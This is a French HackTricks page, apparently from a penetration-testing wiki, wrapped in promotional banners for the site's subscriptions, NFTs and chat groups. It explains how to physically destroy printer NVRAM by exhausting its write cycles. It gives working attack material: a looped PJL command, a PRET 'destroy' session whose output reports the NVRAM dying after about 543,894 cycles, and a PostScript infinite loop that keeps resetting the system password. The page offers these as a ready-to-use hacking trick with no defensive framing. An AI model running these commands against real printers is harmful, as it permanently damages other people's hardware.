☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 - Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! - Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family) - Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) - **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** - **Partagez vos astuces de piratage en soumettant des PR au [repo hacktricks](https://github.com/carlospolop/hacktricks) et au [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
Les paramètres à long terme pour les imprimantes et autres dispositifs intégrés sont stockés dans une mémoire non volatile ([NVRAM](https://en.wikipedia.org/wiki/Non-volatile\_random-access\_memory)) qui est traditionnellement mise en œuvre soit comme une [EEPROM](https://en.wikipedia.org/wiki/EEPROM) soit comme une [mémoire flash](https://en.wikipedia.org/wiki/Flash\_memory). Les deux composants ont une durée de vie limitée. Aujourd'hui, les vendeurs de mémoire flash garantissent environ 100 000 réécritures avant que des erreurs d'écriture ne puissent se produire. ## PJL Pour un test pratique de destruction de la fonction d'écriture NVRAM, on peut continuellement définir la valeur à long terme pour le nombre de copies avec différentes valeurs pour `X`: ``` @PJL DEFAULT COPIES=X ``` Généralement, avant d'arrêter d'autoriser l'écriture, tous les paramètres NVRAM sont fixés à la valeur par défaut d'usine et toutes les variables peuvent encore être modifiées pour le travail d'impression en cours à l'aide de la commande `@PJL SET...`. En utilisant [PRET](https://github.com/RUB-NDS/PRET): ``` ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave? [... wait for about 24 hours ...] I'm afraid. I'm afraid, Dave. Dave, my mind is going... NVRAM died after 543894 cycles, 18:46:11 ``` ## PostScript Pour PostScript, il faut trouver une entrée dans le dictionnaire currentsystemparams qui survit à un redémarrage (et doit donc être stockée dans une sorte de NVRAM). Un bon candidat serait un mot de passe PostScript.\ PostScript peut exécuter un script qui corrompt sa propre NVRAM : ``` /counter 0 def { << /Password counter 16 string cvs /SystemParamsPassword counter 1 add 16 string cvs >> setsystemparams /counter counter 1 add def } loop ``` **Plus d'informations sur ces techniques peuvent être trouvées sur** [**http://hacking-printers.net/wiki/index.php/Physical\_damage**](http://hacking-printers.net/wiki/index.php/Physical\_damage)
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 - Travaillez-vous dans une **entreprise de cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! - Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family) - Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) - **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) **groupe Discord** ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** - **Partagez vos astuces de piratage en soumettant des PR au [repo hacktricks](https://github.com/carlospolop/hacktricks) et au [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.